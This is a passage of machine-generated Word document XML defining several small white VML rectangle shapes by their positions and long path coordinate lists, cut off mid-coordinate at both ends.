4736,12145,4736,12144,4736,12143,4736,12141,4736,12140,4736,12139,4736,12137,4736,12136,4736,12134,4736,12132,4736,12131,4736,12129,4736,12127,4736,12125,4736,12124,4736,12122,4736,12120,4736,12118,4736,12115,4736,12113,4736,12111,4736,12109,4736,12106,4736,12104,4736,12101,4736,12099,4736,12096,4736,12093,4736,12090,4736,12088,4736,12085,4736,12082,4736,12079,4736,12075,4736,12072,4736,12069,4736,12065,4736,12062,4736,12058,4736,12055,4736,12051,4736,12047,4736,12043,4736,12039,4736,12035,4736,12031,4736,12027,4736,12023,4736,12018,4736,12014,4736,12009,4736,12004,4736,12000,4736,11995,4736,11990,4736,11985,4736,11980,4736,11974,4736,11969,4736,11964,4736,11958,4736,11952,4736,11947,4736,11941,4736,11935,4736,11929,4736,11923,4736,11916,4736,11910e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:319.500pt;margin-top:594.500pt;width:6.500pt;height:13.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="6390,11890" coordsize="130,270">
        <v:shape style="position:absolute;left:6390;top:11890;width:130;height:270" coordorigin="6390,11890" coordsize="130,270" path="m6417,11910l6417,11910,6417,11910,6417,11910,6417,11910,6417,11910,6417,11910,6417,11910,6417,11910,6417,11910,6417,11910,6417,11910,6417,11910,6417,11910,6417,11910,6417,11910,6417,11910,6418,11910,6418,11910,6418,11910,6418,11910,6418,11910,6418,11910,6418,11910,6418,11910,6418,11910,6418,11910,6418,11910,6419,11910,6419,11910,6419,11910,6419,11910,6419,11910,6420,11910,6420,11910,6420,11910,6420,11910,6421,11910,6421,11910,6421,11910,6421,11910,6422,11910,6422,11910,6423,11910,6423,11910,6423,11910,6424,11910,6424,11910,6425,11910,6425,11910,6426,11910,6426,11910,6427,11910,6427,11910,6428,11910,6428,11910,6429,11910,6430,11910,6430,11910,6431,11910,6432,11910,6433,11910,6433,11910,6434,11910,6435,11910,6436,11910,6437,11910,6438,11910,6439,11910,6440,11910,6441,11910,6442,11910,6443,11910,6444,11910,6445,11910,6446,11910,6447,11910,6449,11910,6450,11910,6451,11910,6452,11910,6454,11910,6455,11910,6457,11910,6458,11910,6459,11910,6461,11910,6463,11910,6464,11910,6466,11910,6467,11910,6469,11910,6471,11910,6473,11910,6475,11910,6476,11910,6478,11910,6480,11910,6482,11910,6484,11910,6486,11910,6488,11910,6491,11910,6493,11910,6495,11910,6497,11910,6500,11910,6502,11910,6505,11910,6507,11910,6509,11910,6512,11910,6515,11910,6517,11910,6520,11910,6523,11910,6526,11910,6528,11910,6531,11910,6534,11910,6537,11910,6537,11910,6537,11910,6537,11910,6537,11910,6537,11910,6537,11910,6537,11910,6537,11910,6537,11910,6537,11910,6537,11910,6537,11910,6537,11910,6537,11910,6537,11910,6537,11911,6537,11911,6537,11911,6537,11911,6537,11911,6537,11911,6537,11911,6537,11912,6537,11912,6537,11912,6537,11912,6537,11913,6537,11913,6537,11913,6537,11914,6537,11914,6537,11915,6537,11915,6537,11915,6537,11916,6537,11916,6537,11917,6537,11918,6537,11918,6537,11919,6537,11920,6537,11920,6537,11921,6537,11922,6537,11923,6537,11924,6537,11925,6537,11926,6537,11927,6537,11928,6537,11929,6537,11930,6537,11931,6537,11933,6537,11934,6537,11935,6537,11937,6537,11938,6537,11940,6537,11941,6537,11943,6537,11944,6537,11946,6537,11948,6537,11950,6537,11952,6537,11954,6537,11956,6537,11958,6537,11960,6537,11962,6537,11964,6537,11967,6537,11969,6537,11971,6537,11974,6537,11976,6537,11979,6537,11982,6537,11985,6537,11988,6537,11990,6537,11993,6537,11997,6537,12000,6537,12003,6537,12006,6537,12010,6537,12013,6537,12017,6537,12020,6537,12024,6537,12028,6537,12032,6537,12036,6537,12040,6537,12044,6537,12048,6537,12052,6537,12057,6537,12061,6537,12066,6537,12071,6537,12075,6537,12080,6537,12085,6537,12090,6537,12095,6537,12101,6537,12106,6537,12112,6537,12117,6537,12123,6537,12128,6537,12134,6537,12140,6537,12146,6537,12152,6537,12159,6537,12165,6537,12165,6537,12165,6537,12165,6537,12165,6537,12165,6537,12165,6537,12165,6537,12165,6537,12165,6537,12165,6537,12165,6537,12165,6537,12165,6537,12165,6537,12165,6537,12165,6537,12165,6537,12165,6537,12165,6537,12165,6537,12165,6537,12165,6537,12165,6536,12165,6536,12165,6536,12165,6536,12165,6536,12165,6536,12165,6536,12165,6535,12165,6535,12165,6535,12165,6535,12165,6534,12165,6534,12165,6534,12165,6534,12165,6533,12165,6533,12165,6533,12165,6532,12165,6532,12165,6532,12165,6531,12165,6531,12165,6530,12165,6530,12165,6529,12165,6529,12165,6528,12165,6528,12165,6527,12165,6527,12165,6526,12165,6525,12165,6525,12165,6524,12165,6523,12165,6523,12165,6522,12165,6521,12165,6520,12165,6519,12165,6519,12165,6518,12165,6517,12165,6516,12165,6515,12165,6514,12165,6513,12165,6512,12165,6511,12165,6510,12165,6508,12165,6507,12165,6506,12165,6505,12165,6503,12165,6502,12165,6501,12165,6499,12165,6498,12165,6497,12165,6495,12165,6494,12165,6492,12165,6490,12165,6489,12165,6487,12165,6485,12165,6484,12165,6482,12165,6480,12165,6478,12165,6476,12165,6474,12165,6472,12165,6470,12165,6468,12165,6466,12165,6464,12165,6462,12165,6459,12165,6457,12165,6455,12165,6452,12165,6450,12165,6448,12165,6445,12165,6442,12165,6440,12165,6437,12165,6434,12165,6432,12165,6429,12165,6426,12165,6423,12165,6420,12165,6417,12165,6417,12165,6417,12165,6417,12165,6417,12165,6417,12165,6417,12165,6417,12165,6417,12165,6417,12165,6417,12165,6417,12165,6417,12165,6417,12165,6417,12165,6417,12165,6417,12165,6417,12165,6417,12164,6417,12164,6417,12164,6417,12164,6417,12164,6417,12164,6417,12163,6417,12163,6417,12163,6417,12162,6417,12162,6417,12162,6417,12161,6417,12161,6417,12161,6417,12160,6417,12160,6417,12159,6417,12159,6417,12158,6417,12157,6417,12157,6417,12156,6417,12155,6417,12155,6417,12154,6417,12153,6417,12152,6417,12151,6417,12150,6417,12149,6417,12148,6417,12147,6417,12146,6417,12145,6417,12144,6417,12143,6417,12141,6417,12140,6417,12139,6417,12137,6417,12136,6417,12134,6417,12132,6417,12131,6417,12129,6417,12127,6417,12125,6417,12124,6417,12122,6417,12120,6417,12118,6417,12115,6417,12113,6417,12111,6417,12109,6417,12106,6417,12104,6417,12101,6417,12099,6417,12096,6417,12093,6417,12090,6417,12088,6417,12085,6417,12082,6417,12079,6417,12075,6417,12072,6417,12069,6417,12065,6417,12062,6417,12058,6417,12055,6417,12051,6417,12047,6417,12043,6417,12039,6417,12035,6417,12031,6417,12027,6417,12023,6417,12018,6417,12014,6417,12009,6417,12004,6417,12000,6417,11995,6417,11990,6417,11985,6417,11980,6417,11974,6417,11969,6417,11964,6417,11958,6417,11952,6417,11947,6417,11941,6417,11935,6417,11929,6417,11923,6417,11916,6417,11910e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:355.500pt;margin-top:594.500pt;width:6.500pt;height:13.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="7110,11890" coordsize="130,270">
        <v:shape style="position:absolute;left:7110;top:11890;width:130;height:270" coordorigin="7110,11890" coordsize="130,270" path="m7138,11910l7138,11910,7138,11910,7138,11910,7138,11910,7138,11910,7138,11910,7138,11910,7138,11910,7138,11910,7138,11910,7138,11910,7138,11910,7138,11910,7138,11910,7138,11910,7138,11910,7138,11910,7138,11910,7138,11910,7138,11910,7138,11910,7138,11910,7138,11910,7138,11910,7139,11910,7139,11910,7139,11910,7139,11910,7139,11910,7139,11910,7140,11910,7140,11910,7140,11910,7140,11910,7140,11910,7141,11910,7141,11910,7141,11910,7142,11910,7142,11910,7142,11910,7143,11910,7143,11910,7143,11910,7144,11910,7144,11910,7145,11910,7145,11910,7145,11910,7146,11910,7147,11910,7147,11910,7148,11910,7148,11910,7149,11910,7149,11910,7150,11910,7151,11910,7151,11910,7152,11910,7153,11910,7154,11910,7155,11910,7155,11910,7156,11910,7157,11910,7158,11910,7159,11910,7160,11910,7161,11910,7162,11910,7163,11910,7164,11910,7165,11910,7166,11910,7168,11910,7169,11910,7170,11910,7171,11910,7173,11910,7174,11910,7175,11910,7177,11910,7178,11910,7180,11910,7181,11910,7183,11910,7185,11910,7186,11910,7188,11910,7190,11910,7191,11910,7193,11910,7195,11910,7197,11910,7199,11910,7201,11910,7203,11910,7205,11910,7207,11910,7209,11910,7211,11910,7213,11910,7215,11910,7218,11910,7220,11910,7222,11910,7225,11910,7227,11910,7230,11910,7232,11910,7235,11910,7238,11910,7240,11910,7243,11910,7246,11910,7249,11910,7252,11910,7255,11910,7258,11910,7258,11910,7258,11910,7258,11910,7258,11910,7258,11910,7258,11910,7258,11910,7258,11910,7258,11910,7258,11910,7258,11910,7258,11910,7258,11910,7258,11910,7258,11910,7258,11911,7258,11911,7258,11911,7258,11911,7258,11911,7258,11911,7258,11911,7258,11912,7258,11912,7258,11912,7258,11912,7258,11913,7258,11913,7258,11913,7258,11914,7258,11914,7258,11915,7258,11915,7258,11915,7258,11916,7258,11916,7258,11917,7258,11918,7258,11918,7258,11919,7258,11920,7258,11920,7258,11921,7258,11922,7258,11923,7258,11924,7258,11925,7258,11926,7258,11927,7258,11928,7258,11929,7258,11930,7258,11931,7258,11933,7258,11934,7258,11935,7258,11937,7258,11938,7258,11940,7258,11941,7258,11943,7258,11944,7258,11946,7258,11948,7258,11950,7258,11952,7258,11954,7258,11956,7258,11958,7258,11960,7258,11962,7258,11964,7258,11967,7258,11969,7258,11971,7258,11974,7258,11976,7258,11979,7258,11982,7258,11985,7258,11988,7258,11990,7258,11993,7258,11997,7258,12000,7258,12003,7258,12006,7258,12010,7258,12013,7258,12017,7258,12020,7258,12024,7258,12028,7258,12032,7258,12036,7258,12040,7258,12044,7258,12048,7258,12052,7258,12057,7258,12061,7258,12066,7258,12071,7258,12075,7258,12080,7258,12085,7258,12090,7258,12095,7258,12101,7258,12106,7258,12112,7258,12117,7258,12123,7258,12128,7258,12134,7258,12140,7258,12146,7258,12152,7258,12159,7258,12165,7258,12165,7258,12165,7258,12165,7258,12165,7258,12165,7258,12165,7258,12165,7258,12165,7258,12165,7258,12165,7258,12165,7258,12165,7258,12165,7257,12165,7257,12165,7257,12165,7257,12165,7257,12165,7257,12165,7257,12165,7257,12165,7257,12165,7257,12165,7257,12165,7257,12165,7257,12165,7256,12165,7256,12165,7256,12165,7256,12165,7256,12165,7256,12165,7255,12165,7255,12165,7255,12165,7255,12165,7254,12165,7254,12165,7254,12165,7253,12165,7253,12165,7253,12165,7252,12165,7252,12165,7252,12165,7251,12165,7251,12165,7250,12165,7250,12165,7249,12165,7249,12165,7248,12165,7248,12165,7247,12165,7246,12165,7246,12165,7245,12165,7244,12165,7244,12165,7243,12165,7242,12165,7241,12165,7241,12165,7240,12165,7239,12165,7238,12165,7237,12165,7236,12165,7235,12165,7234,12165,7233,12165,7232,12165,7231,12165,7230,12165,7229,12165,7228,12165,7226,12165,7225,12165,7224,12165,7223,12165,7221,12165,7220,12165,7218,12165,7217,12165,7215,12165,7214,12165,7212,12165,7211,12165,7209,12165,7207,12165,7206,12165,7204,12165,7202,12165,7200,12165,7198,12165,7197,12165,7195,12165,7193,12165,7191,12165,7189,12165,7186,12165,7184,12165,7182,12165,7180,12165,7178,12165,7175,12165,7173,12165,7170,12165,7168,12165,7165,12165,7163,12165,7160,12165,7158,12165,7155,12165,7152,12165,7149,12165,7146,12165,7144,12165,7141,12165,7138,12165,7138,12165,7138,12165,7138,12165,7138,12165,7138,12165,7138,12165,7138,12165,7138,12165,7138,12165,7138,12165,7138,12165,7138,12165,7138,12165,7138,12165,7138,12165,7138,12165,7138,12165,7138,12164,7138,12164,7138,12164,7138,12164,7138,12164,7138,12164,7138,12163,7138,12163,7138,12163,7138,12162,7138,12162,7138,12162,7138,12161,7138,12161,7138,12161,7138,12160,7138,12160,7138,12159,7138,12159,7138,12158,7138,12157,7138,12157,7138,12156,7138,12155,7138,12155,7138,12154,7138,12153,7138,12152,7138,12151,7138,12150,7138,12149,7138,12148,7138,12147,7138,12146,7138,12145,7138,12144,7138,12143,7138,12141,7138,12140,7138,12139,7138,12137,7138,12136,7138,12134,7138,12132,7138,12131,7138,12129,7138,12127,7138,12125,7138,12124,7138,12122,7138,12120,7138,12118,7138,12115,7138,12113,7138,12111,7138,12109,7138,12106,7138,12104,7138,12101,7138,12099,7138,12096,7138,12093,7138,12090,7138,12088,7138,12085,7138,12082,7138,12079,7138,12075,7138,12072,7138,12069,7138,12065,7138,12062,7138,12058,7138,12055,7138,12051,7138,12047,7138,12043,7138,12039,7138,12035,7138,12031,7138,12027,7138,12023,7138,12018,7138,12014,7138,12009,7138,12004,7138,12000,7138,11995,7138,11990,7138,11985,7138,11980,7138,11974,7138,11969,7138,11964,7138,11958,7138,11952,7138,11947,7138,11941,7138,11935,7138,11929,7138,11923,7138,11916,7138,11910e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:319.500pt;margin-top:608.500pt;width:6.500pt;height:12.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="6390,12170" coordsize="130,250">
        <v:shape style="position:absolute;left:6390;top:12170;width:130;height:250" coordorigin="6390,12170" coordsize="130,250" path="m6402,12180l6402,12180,6402,12180,6402,12180,6402,12180,6402,12180,6402,12180,6402,12180,6402,12180,6402,12180,6402,12180,6402,12180,6402,12180,6402,12180,6402,12180,6402,12180,6402,12180,6403,12180,6403,12180,6403,12180,6403,12180,6403,12180,6403,12180,6403,12180,6403,12180,6403,12180,6403,12180,6403,12180,6404,12180,6404,12180,6404,12180,6404,12180,6404,12180,6405,12180,6405,12180,6405,12180,6405,12180,6406,12180,6406,12180,6406,12180,6406,12180,6407,12180,6407,12180,6408,12180,6408,12180,6408,12180,6409,12180,6409,12180,6410,12180,6410,12180,6411,12180,6411,12180,6412,12180,6412,12180,6413,12180,6413,12180,6414,12180,6415,12180,6415,12180,6416,12180,6417,12180,6418,12180,6418,12180,6419,12180,6420,12180,6421,12180,6422,12180,6423,12180,6424,12180,6425,12180,6426,12180,6427,12180,6428,12180,6429,12180,6430,12180,6431,12180,6432,12180,6433,12180,6435,12180,6436,12180,6437,12180,6439,12180,6440,12180,6442,12180,6443,12180,6444,12180,6446,12180,6448,12180,6449,12180,6451,12180,6452,12180,6454,12180,6456,12180,6458,12180,6460,12180,6461,12180,6463,12180,6465,12180,6467,12180,6469,12180,6471,12180,6473,12180,6476,12180,6478,12180,6480,12180,6482,12180,6485,12180,6487,12180,6490,12180,6492,12180,6494,12180,6497,12180,6500,12180,6502,12180,6505,12180,6508,12180,6511,12180,6513,12180,6516,12180,6519,12180,6522,12180,6522,12180,6522,12180,6522,12180,6522,12180,6522,12180,6522,12180,6522,12180,6522,12180,6522,12180,6522,12180,6522,12180,6522,12180,6522,12180,6522,12180,6522,12181,6522,12181,6522,12181,6522,12181,6522,12181,6522,12181,6522,12181,6522,12182,6522,12182,6522,12182,6522,12182,6522,12183,6522,12183,6522,12183,6522,12183,6522,12184,6522,12184,6522,12185,6522,12185,6522,12186,6522,12186,6522,12187,6522,12187,6522,12188,6522,12188,6522,12189,6522,12190,6522,12191,6522,12191,6522,12192,6522,12193,6522,12194,6522,12195,6522,12196,6522,12197,6522,12198,6522,12199,6522,12200,6522,12201,6522,12203,6522,12204,6522,12205,6522,12207,6522,12208,6522,12210,6522,12211,6522,12213,6522,12214,6522,12216,6522,12218,6522,12220,6522,12222,6522,12224,6522,12226,6522,12228,6522,12230,6522,12232,6522,12234,6522,12237,6522,12239,6522,12241,6522,12244,6522,12247,6522,12249,6522,12252,6522,12255,6522,12258,6522,12261,6522,12264,6522,12267,6522,12270,6522,12273,6522,12276,6522,12280,6522,12283,6522,12287,6522,12291,6522,12294,6522,12298,6522,12302,6522,12306,6522,12310,6522,12314,6522,12318,6522,12323,6522,12327,6522,12332,6522,12336,6522,12341,6522,12346,6522,12350,6522,12355,6522,12360,6522,12366,6522,12371,6522,12376,6522,12382,6522,12387,6522,12393,6522,12399,6522,12404,6522,12410,6522,12416,6522,12423,6522,12429,6522,12435,6522,12435,6522,12435,6522,12435,6522,12435,6522,12435,6522,12435,6522,12435,6522,12435,6522,12435,6522,12435,6522,12435,6522,12435,6522,12435,6522,12435,6522,12435,6522,12435,6522,12435,6522,12435,6522,12435,6522,12435,6522,12435,6522,12435,6522,12435,6521,12435,6521,12435,6521,12435,6521,12435,6521,12435,6521,12435,6521,12435,6520,12435,6520,12435,6520,12435,6520,12435,6519,12435,6519,12435,6519,12435,6519,12435,6518,12435,6518,12435,6518,12435,6517,12435,6517,12435,6517,12435,6516,12435,6516,12435,6515,12435,6515,12435,6514,12435,6514,12435,6513,12435,6513,12435,6512,12435,6512,12435,6511,12435,6510,12435,6510,12435,6509,12435,6508,12435,6508,12435,6507,12435,6506,12435,6505,12435,6504,12435,6504,12435,6503,12435,6502,12435,6501,12435,6500,12435,6499,12435,6498,12435,6497,12435,6496,12435,6495,12435,6493,12435,6492,12435,6491,12435,6490,12435,6488,12435,6487,12435,6486,12435,6484,12435,6483,12435,6482,12435,6480,12435,6479,12435,6477,12435,6475,12435,6474,12435,6472,12435,6470,12435,6469,12435,6467,12435,6465,12435,6463,12435,6461,12435,6459,12435,6457,12435,6455,12435,6453,12435,6451,12435,6449,12435,6447,12435,6444,12435,6442,12435,6440,12435,6437,12435,6435,12435,6433,12435,6430,12435,6427,12435,6425,12435,6422,12435,6419,12435,6417,12435,6414,12435,6411,12435,6408,12435,6405,12435,6402,12435,6402,12435,6402,12435,6402,12435,6402,12435,6402,12435,6402,12435,6402,12435,6402,12435,6402,12435,6402,12435,6402,12435,6402,12435,6402,12435,6402,12435,6402,12435,6402,12435,6402,12435,6402,12435,6402,12434,6402,12434,6402,12434,6402,12434,6402,12434,6402,12433,6402,12433,6402,12433,6402,12433,6402,12432,6402,12432,6402,12432,6402,12431,6402,12431,6402,12430,6402,12430,6402,12429,6402,12429,6402,12428,6402,12428,6402,12427,6402,12426,6402,12426,6402,12425,6402,12424,6402,12423,6402,12422,6402,12421,6402,12421,6402,12420,6402,12419,6402,12417,6402,12416,6402,12415,6402,12414,6402,12413,6402,12411,6402,12410,6402,12409,6402,12407,6402,12406,6402,12404,6402,12403,6402,12401,6402,12399,6402,12397,6402,12396,6402,12394,6402,12392,6402,12390,6402,12388,6402,12386,6402,12383,6402,12381,6402,12379,6402,12376,6402,12374,6402,12371,6402,12369,6402,12366,6402,12363,6402,12361,6402,12358,6402,12355,6402,12352,6402,12349,6402,12346,6402,12342,6402,12339,6402,12336,6402,12332,6402,12329,6402,12325,6402,12321,6402,12317,6402,12313,6402,12310,6402,12305,6402,12301,6402,12297,6402,12293,6402,12288,6402,12284,6402,12279,6402,12275,6402,12270,6402,12265,6402,12260,6402,12255,6402,12250,6402,12245,6402,12239,6402,12234,6402,12228,6402,12223,6402,12217,6402,12211,6402,12205,6402,12199,6402,12193,6402,12187,6402,12180e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:235.500pt;margin-top:626.500pt;width:6.500pt;height:12.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="4710,12530" coordsize="130,250">
        <v:shape style="position:absolute;left:4710;top:12530;width:130;height:250" coordorigin="4710,12530" coordsize="130,250" path="m4736,12540l4736,12540,4736,12540,4736,12540,4736,12540,4736,12540,4736,12540,4736,12540,4736,12540,4736,12540,4736,12540,4736,12540,4736,12540,4737,12540,4737,12540,4737,12540,4737,12540,4737,12540,4737,12540,4737,12540,4737,12540,4737,12540,4737,12540,4737,12540,4737,12540,4737,12540,4737,12540,4738,12540,4738,12540,4738,12540,4738,12540,4738,12540,4739,12540,4739,12540,4739,12540,4739,12540,4739,12540,4740,12540,4740,12540,4740,12540,4741,12540,4741,12540,4741,12540,4742,12540,4742,12540,4742,12540,4743,12540,4743,12540,4744,12540,4744,12540,4745,12540,4745,12540,4746,12540,4746,12540,4747,12540,4748,12540,4748,12540,4749,12540,4750,12540,4750,12540,4751,12540,4752,12540,4753,12540,4753,12540,4754,12540,4755,12540,4756,12540,4757,12540,4758,12540,4759,12540,4760,12540,4761,12540,4762,12540,4763,12540,4764,12540,4765,12540,4766,12540,4768,12540,4769,12540,4770,12540,4772,12540,4773,12540,4774,12540,4776,12540,4777,12540,4779,12540,4780,12540,4782,12540,4783,12540,4785,12540,4787,12540,4788,12540,4790,12540,4792,12540,4794,12540,4796,12540,4797,12540,4799,12540,4801,12540,4803,12540,4806,12540,4808,12540,4810,12540,4812,12540,4814,12540,4817,12540,4819,12540,4821,12540,4824,12540,4826,12540,4829,12540,4831,12540,4834,12540,4836,12540,4839,12540,4842,12540,4845,12540,4848,12540,4850,12540,4853,12540,4856,12540,4856,12540,4856,12540,4856,12540,4856,12540,4856,12540,4856,12540,4856,12540,4856,12540,4856,12540,4856,12540,4856,12540,4856,12541,4856,12541,4856,12541,4856,12541,4856,12541,4856,12541,4856,12541,4856,12541,4856,12541,4856,12542,4856,12542,4856,12542,4856,12542,4856,12542,4856,12543,4856,12543,4856,12543,4856,12544,4856,12544,4856,12544,4856,12545,4856,12545,4856,12546,4856,12546,4856,12547,4856,12547,4856,12548,4856,12549,4856,12549,4856,12550,4856,12551,4856,12552,4856,12552,4856,12553,4856,12554,4856,12555,4856,12556,4856,12557,4856,12558,4856,12559,4856,12560,4856,12562,4856,12563,4856,12564,4856,12566,4856,12567,4856,12568,4856,12570,4856,12571,4856,12573,4856,12575,4856,12576,4856,12578,4856,12580,4856,12582,4856,12584,4856,12586,4856,12588,4856,12590,4856,12592,4856,12595,4856,12597,4856,12599,4856,12602,4856,12604,4856,12607,4856,12609,4856,12612,4856,12615,4856,12618,4856,12621,4856,12624,4856,12627,4856,12630,4856,12633,4856,12637,4856,12640,4856,12643,4856,12647,4856,12651,4856,12654,4856,12658,4856,12662,4856,12666,4856,12670,4856,12674,4856,12678,4856,12683,4856,12687,4856,12692,4856,12696,4856,12701,4856,12706,4856,12711,4856,12716,4856,12721,4856,12726,4856,12731,4856,12736,4856,12742,4856,12747,4856,12753,4856,12759,4856,12765,4856,12771,4856,12777,4856,12783,4856,12789,4856,12795,4856,12795,4856,12795,4856,12795,4856,12795,4856,12795,4856,12795,4856,12795,4856,12795,4856,12795,4856,12795,4856,12795,4856,12795,4856,12795,4856,12795,4856,12795,4856,12795,4856,12795,4856,12795,4856,12795,4856,12795,4856,12795,4856,12795,4856,12795,4856,12795,4855,12795,4855,12795,4855,12795,4855,12795,4855,12795,4855,12795,4855,12795,4854,12795,4854,12795,4854,12795,4854,12795,4853,12795,4853,12795,4853,12795,4853,12795,4852,12795,4852,12795,4852,12795,4851,12795,4851,12795,4850,12795,4850,12795,4850,12795,4849,12795,4849,12795,4848,12795,4848,12795,4847,12795,4846,12795,4846,12795,4845,12795,4845,12795,4844,12795,4843,12795,4843,12795,4842,12795,4841,12795,4840,12795,4839,12795,4839,12795,4838,12795,4837,12795,4836,12795,4835,12795,4834,12795,4833,12795,4832,12795,4831,12795,4830,12795,4829,12795,4828,12795,4826,12795,4825,12795,4824,12795,4823,12795,4821,12795,4820,12795,4819,12795,4817,12795,4816,12795,4814,12795,4813,12795,4811,12795,4810,12795,4808,12795,4806,12795,4805,12795,4803,12795,4801,12795,4799,12795,4797,12795,4795,12795,4793,12795,4791,12795,4789,12795,4787,12795,4785,12795,4783,12795,4781,12795,4779,12795,4776,12795,4774,12795,4772,12795,4769,12795,4767,12795,4764,12795,4762,12795,4759,12795,4756,12795,4754,12795,4751,12795,4748,12795,4745,12795,4742,12795,4739,12795,4736,12795,4736,12795,4736,12795,4736,12795,4736,12795,4736,12795,4736,12795,4736,12795,4736,12795,4736,12795,4736,12795,4736,12795,4736,12795,4736,12795,4736,12795,4736,12795,4736,12795,4736,12795,4736,12795,4736,12795,4736,12794,4736,12794,4736,12794,4736,12794,4736,12794,4736,12793,4736,12793,4736,12793,4736,12792,4736,12792,4736,12792,4736,12791,4736,12791,4736,12790,4736,12790,4736,12789,4736,12789,4736,12788,4736,12788,4736,12787,4736,12786,4736,12786,4736,12785,4736,12784,4736,12783,4736,12783,4736,12782,4736,12781,4736,12780,4736,12779,4736,12778,4736,12777,4736,12775,4736,12774,4736,12773,4736,12772,4736,12770,4736,12769,4736,12767,4736,12766,4736,12764,4736,12763,4736,12761,4736,12759,4736,12758,4736,12756,4736,12754,4736,12752,4736,12750,4736,12748,4736,12746,4736,12744,4736,12741,4736,12739,4736,12737,4736,12734,4736,12732,4736,12729,4736,12726,4736,12724,4736,12721,4736,12718,4736,12715,4736,12712,4736,12709,4736,12706,4736,12702,4736,12699,4736,12696,4736,12692,4736,12689,4736,12685,4736,12681,4736,12678,4736,12674,4736,12670,4736,12666,4736,12661,4736,12657,4736,12653,4736,12649,4736,12644,4736,12639,4736,12635,4736,12630,4736,12625,4736,12620,4736,12615,4736,12610,4736,12605,4736,12599,4736,12594,4736,12588,4736,12583,4736,12577,4736,12571,4736,12565,4736,12559,4736,12553,4736,12547,4736,12540e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:319.500pt;margin-top:626.500pt;width:6.500pt;height:12.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="6390,12530" coordsize="130,250">
        <v:shape style="position:absolute;left:6390;top:12530;width:130;height:250" coordorigin="6390,12530" coordsize="130,250" path="m6417,12540l6417,12540,6417,12540,6417,12540,6417,12540,6417,12540,6417,12540,6417,12540,6417,12540,6417,12540,6417,12540,6417,12540,6417,12540,6417,12540,6417,12540,6417,12540,6417,12540,6418,12540,6418,12540,6418,12540,6418,12540,6418,12540,6418,12540,6418,12540,6418,12540,6418,12540,6418,12540,6418,12540,6419,12540,6419,12540,6419,12540,6419,12540,6419,12540,6420,12540,6420,12540,6420,12540,6420,12540,6421,12540,6421,12540,6421,12540,6421,12540,6422,12540,6422,12540,6423,12540,6423,12540,6423,12540,6424,12540,6424,12540,6425,12540,6425,12540,6426,12540,6426,12540,6427,12540,6427,12540,6428,12540,6428,12540,6429,12540,6430,12540,6430,12540,6431,12540,6432,12540,6433,12540,6433,12540,6434,12540,6435,12540,6436,12540,6437,12540,6438,12540,6439,12540,6440,12540,6441,12540,6442,12540,6443,12540,6444,12540,6445,12540,6446,12540,6447,12540,6449,12540,6450,12540,6451,12540,6452,12540,6454,12540,6455,12540,6457,12540,6458,12540,6459,12540,6461,12540,6463,12540,6464,12540,6466,12540,6467,12540,6469,12540,6471,12540,6473,12540,6475,12540,6476,12540,6478,12540,6480,12540,6482,12540,6484,12540,6486,12540,6488,12540,6491,12540,6493,12540,6495,12540,6497,12540,6500,12540,6502,12540,6505,12540,6507,12540,6509,12540,6512,12540,6515,12540,6517,12540,6520,12540,6523,12540,6526,12540,6528,12540,6531,12540,6534,12540,6537,12540,6537,12540,6537,12540,6537,12540,6537,12540,6537,12540,6537,12540,6537,12540,6537,12540,6537,12540,6537,12540,6537,12540,6537,12541,6537,12541,6537,12541,6537,12541,6537,12541,6537,12541,6537,12541,6537,12541,6537,12541,6537,12542,6537,12542,6537,12542,6537,12542,6537,12542,6537,12543,6537,12543,6537,12543,6537,12544,6537,12544,6537,12544,6537,12545,6537,12545,6537,12546,6537,12546,6537,12547,6537,12547,6537,12548,6537,12549,6537,12549,6537,12550,6537,12551,6537,12552,6537,12552,6537,12553,6537,12554,6537,12555,6537,12556,6537,12557,6537,12558,6537,12559,6537,12560,6537,12562,6537,12563,6537,12564,6537,12566,6537,12567,6537,12568,6537,12570,6537,12571,6537,12573,6537,12575,6537,12576,6537,12578,6537,12580,6537,12582,6537,12584,6537,12586,6537,12588,6537,12590,6537,12592,6537,12595,6537,12597,6537,12599,6537,12602,6537,12604,6537,12607,6537,12609,6537,12612,6537,12615,6537,12618,6537,12621,6537,12624,6537,12627,6537,12630,6537,12633,6537,12637,6537,12640,6537,12643,6537,12647,6537,12651,6537,12654,6537,12658,6537,12662,6537,12666,6537,12670,6537,12674,6537,12678,6537,12683,6537,12687,6537,12692,6537,12696,6537,12701,6537,12706,6537,12711,6537,12716,6537,12721,6537,12726,6537,12731,6537,12736,6537,12742,6537,12747,6537,12753,6537,12759,6537,12765,6537,12771,6537,12777,6537,12783,6537,12789,6537,12795,6537,12795,6537,12795,6537,12795,6537,12795,6537,12795,6537,12795,6537,12795,6537,12795,6537,12795,6537,12795,6537,12795,6537,12795,6537,12795,6537,12795,6537,12795,6537,12795,6537,12795,6537,12795,6537,12795,6537,12795,6537,12795,6537,12795,6537,12795,6536,12795,6536,12795,6536,12795,6536,12795,6536,12795,6536,12795,6536,12795,6535,12795,6535,12795,6535,12795,6535,12795,6534,12795,6534,12795,6534,12795,6534,12795,6533,12795,6533,12795,6533,12795,6532,12795,6532,12795,6532,12795,6531,12795,6531,12795,6530,12795,6530,12795,6529,12795,6529,12795,6528,12795,6528,12795,6527,12795,6527,12795,6526,12795,6525,12795,6525,12795,6524,12795,6523,12795,6523,12795,6522,12795,6521,12795,6520,12795,6519,12795,6519,12795,6518,12795,6517,12795,6516,12795,6515,12795,6514,12795,6513,12795,6512,12795,6511,127